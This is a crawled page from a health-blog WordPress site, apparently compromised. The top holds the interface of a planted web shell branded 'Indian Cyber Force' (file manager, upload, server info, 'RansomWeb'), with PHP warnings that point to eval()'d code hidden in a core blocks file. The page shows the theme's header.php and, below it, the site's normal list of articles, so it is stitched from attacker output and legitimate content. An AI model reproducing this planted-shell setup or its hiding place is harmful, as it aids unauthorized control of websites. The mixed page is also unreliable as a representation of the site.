Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful-mag-blog/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful-mag-blog/header.php
<?php
/**
 * The header for our theme
 *
 * This is the template that displays the <head> section, Header and Navigation
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Graceful Mag Blog
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
    <meta charset="<?php bloginfo( 'charset' ); ?>">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="http://gmpg.org/xfn/11">
    <?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
    <?php wp_body_open(); ?>

	<?php
	if ( graceful_options( 'basic_header_width' ) === 'wrapped' ) {
	    $graceful_header_width = 'class=wrapped-content';
	} else {
	    $graceful_header_width = '';
	}
	if ( graceful_options( 'basic_content_width' ) === 'wrapped' ) {
	    $graceful_content_width = 'wrapped-content';
	} else {
	    $graceful_content_width = '';
	}
	?>

	<?php // Site Loading Animation
	get_template_part('template-parts/sections/site', 'loadinganim'); 
	?>

	<a class="skip-link screen-reader-text" href="#primary"><?php esc_html_e( 'Skip to content', 'graceful-mag-blog' ); ?></a>	

	<div id="site-container">
		<div id="site-header" <?php echo esc_attr( $graceful_header_width ); ?>>
		<?php
		
		get_template_part( 'template-parts/header/top', 'navigation' );
		get_template_part( 'template-parts/header/site', 'header' );
		get_template_part( 'template-parts/header/main', 'navigation' );
		
		?>
		</div><!-- site-header close -->

		<!-- Page Content -->
		<main id="primary" class="site-main">
		<?php
			if ( is_home() && !is_paged() ) {

			    $graceful_popular_post_enabled = graceful_mag_blog_options('trending_post_ticker_show');
			    // Show Post Ticker if enabled
			    if ( $graceful_popular_post_enabled ) {
			        get_template_part('template-parts/sections/trending', 'posts');
			    }

			    $graceful_post_slider_enabled = graceful_options('post_slider_label');
			    // Show Post Slider if enabled
			    if ( $graceful_post_slider_enabled ) {
			        get_template_part('template-parts/sections/post', 'slider');
			    }

			    // Show Featured Boxes if enabled
			    $graceful_featured_boxes_enabled = graceful_mag_blog_options('featured_boxes_show');
			    if ( $graceful_featured_boxes_enabled ) {
			        get_template_part('template-parts/sections/featured', 'boxes');
			    }
			    
			}
		?>
		<div class="main-content clear-fix <?php echo esc_attr( $graceful_content_width ); ?>" data-layout="<?php echo esc_attr( graceful_page_layout() ); ?>" data-sidebar-sticky="<?php echo esc_attr( graceful_options( 'basic_sidebar_sticky' ) ); ?>">
wellwisehub – Page 4 Skip to content
wellwisehub

Latest Articles

  • Blog

    Evaluating the Value of a Professional Intervention

  • Blog

    “Embracing a Healthy Lifestyle: A Student’s Perspective”

  • Blog

    Comprehensive Guide to Postpartum Care Following Vaginal Birth

  • Blog

    4 Effective Strategies for Enhancing Workplace Safety with Safety Goggles

  • Blog

    Evaluating the Effectiveness of PEMF Therapy in Autism Spectrum Disorder Management

  • Blog

    Analyzing the Root Causes of Drug and Alcohol Addiction

  • Blog

    Essential Advice for Nurturing Your Hands and Feet

  • Blog

    Comparing Bali Kratom vs. Maeng Da: 6 Key Distinctions to Know

  • Blog

    Prolong Your Life with Products and Lifestyle Enhancements

  • Blog

    Effective Strategies to Help You Save Money on Medication

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes